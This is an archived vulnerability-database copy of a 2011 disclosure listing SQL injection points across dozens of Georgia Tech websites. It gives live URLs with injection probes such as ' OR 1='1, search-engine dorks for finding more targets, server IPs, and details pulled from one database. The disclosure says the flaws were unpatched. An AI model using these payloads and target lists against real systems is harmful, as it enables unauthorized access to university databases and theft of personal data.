Vulners
Lucene search
Georgia Tech SQL Injection
`*********************************************************
Georgia Tech
Multiple SQL Injection Vulnerabilities
*********************************************************
# #
# )\._.,--....,'``. #
# .b--. /; _.. \ _\ (`._ ,. #
# `=,-,-'~~~ `----(,_..'--(,_..'`-.;.' #
# #
# Disclosure by: cats #
# Domain: gatech.edu #
# #
# [1] Description #
# [2] Extracted sample data #
# [3] Vulnerabilities and details #
# #
*********************************************************
[1] Description
A large amount of vulnerabilities have been found in just
about every site and service that gatech.edu has online.
The ones listed here in this document are just a small
amount of the real thing, and these are only SQL injections,
which seems to be their biggest issue. And with a simple
Google dork, a lot of more vulnerabilites can be found
under this domain.
Since one of their issues lies in /news/event.php, a
simple Google search of that within the domain will show
a lot of their affected sites.
http://www.google.se/#q=gatech.edu&hl=en&ei=sEe5TMW5KMyVOv
2R2YkN&start=70&sa=N&fp=e32992756bb43726
https://encrypted.google.com/search?q=allinurl:+/news/even
t.php%3Fid%3D+site:gatech.edu&hl=en&lr=&ei=2lHKTPm-IcSBlAf
bnvHtCg&start=10&sa=N
The people responsible for these services have been notified
some time ago and they have had a lot of time to fix the
issues, although it seems like they are ignoring the
warnings.
A very limited amount of sensitive information will be
disclosed in this document (apart from the vulnerabilities).
[2] Extracted sample data
IP: 130.207.160.82
URL: http://www.studentaffairs.gatech.edu/plugins/content/index.php?id=21
Database username: [email protected]
Database name: studentaffairs
Database Version : 5.1.40-community-log
Number of tables in database: 228
[3] Vulnerabilities and details
130.207.160.82
http://www.chemistry.gatech.edu/events/special/index.php?sID=1%20AND%201=2
http://www.successprograms.gatech.edu/plugins/content/index.php?id=181' OR 1='1
http://www.studentaffairs.gatech.edu/plugins/content/index.php?id=21' OR 1='1
http://webdev.gatech.edu/46/plugins/content/index.php?id=129' OR 1='1
http://www.cqgrd.gatech.edu/story.php?id=5137%20AND%201=2
http://www.crc.gatech.edu/plugins/content/index.php?id=351%27%20AND%201=%271
http://www.chemistry.gatech.edu/news/release.php?id=4570%20AND%201=1
http://www.inta.gatech.edu/news-events/news/release.php?id=5167%20AND%201=2
http://www.inta.gatech.edu/news-events/events/event.php?id=6439%20AND%201=2
http://www.cetl.gatech.edu/events/event.php?id=5830%27
http://www.profpractice.gatech.edu/news/event.php?id=4019%20AND%201=1
http://www.hts.gatech.edu/news/event.php?id=3679%20AND%201=1
http://www.cope.gatech.edu/news/event.php?id=5900%20AND%201=1
http://www.ptfe.gatech.edu/news/event.php?id=5367%20AND%201=1
http://www.honor.gatech.edu/plugins/content/index.php?id=9%27%20AND%201=%271
http://www.career.gatech.edu/plugins/content/index.php?id=241%27%20AND%201=%271
http://www.gradcoop.gatech.edu/news/event.php?id=5112%20AND%201=2
http://www.coop.gatech.edu/news/event.php?id=5208%20AND%201=2
http://www.op.gatech.edu/news/story.php?id=1256%20AND%201=1
128.61.179.103
http://tempest.arch.gatech.edu/news/story.php?id=1233%20AND%201=1
https://escol.coa.gatech.edu/news/story.php?id=1187%20AND%201=2
130.207.91.98
http://www.ptfe.gatech.edu/news/event.php?id=5803%20AND%201=2
130.207.66.87
http://www.biology.gatech.edu/news/story.php?id=5201%20AND%201=1
http://www.test.biology.gatech.edu/news/story.php?id=3096%20AND%201=1
128.61.135.12
http://www.bme.gatech.edu/calendar/calendar_files/event_info.php?event_id=457%20AND%201=1
130.207.243.18
http://www.housing.gatech.edu/features/FeatureDisplay.cfm?FEATNO=159%20AND%201=2
130.207.244.120
http://www.gatech.edu/departments/index.html?id=1186%20AND%201=1%20--
http://www.gatech.edu/contact/index.html?id=n5183%20AND%201=1
http://www.gatech.edu/news-room/contact-person-news.php?id=1896&n=5183 AND 1=2
Other (Mostly new ones, not checked for blind or visible SQLi)
http://www.test.biology.gatech.edu/news/story.php?id=3096%20AND%201=1
http://www.op.gatech.edu/news/story.php?id=1256%20AND%201=1
http://tempest.arch.gatech.edu/news/story.php?id=1233%20AND%201=1
https://escol.coa.gatech.edu/news/story.php?id=1187%20AND%201=2
http://www2.me.gatech.edu/www/theses/summary.asp?db=1&LASTNAME=Abbasi&FIRSTNAME=Zubair'
http://dcom.arch.gatech.edu/pcibim/memberscomment.asp?docid=30
http://bim.arch.gatech.edu/app/bimtools/tool.asp?id=431&app_id=15
http://bim.arch.gatech.edu/content_view.asp?id=550%20AND%201=1
(Needs POST data, use the search field)
http://www2.me.gatech.edu/www/theses/Search.asp
#End of file
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Jan 2011 00:00Current
0.8Low risk
Vulners AI Score0.8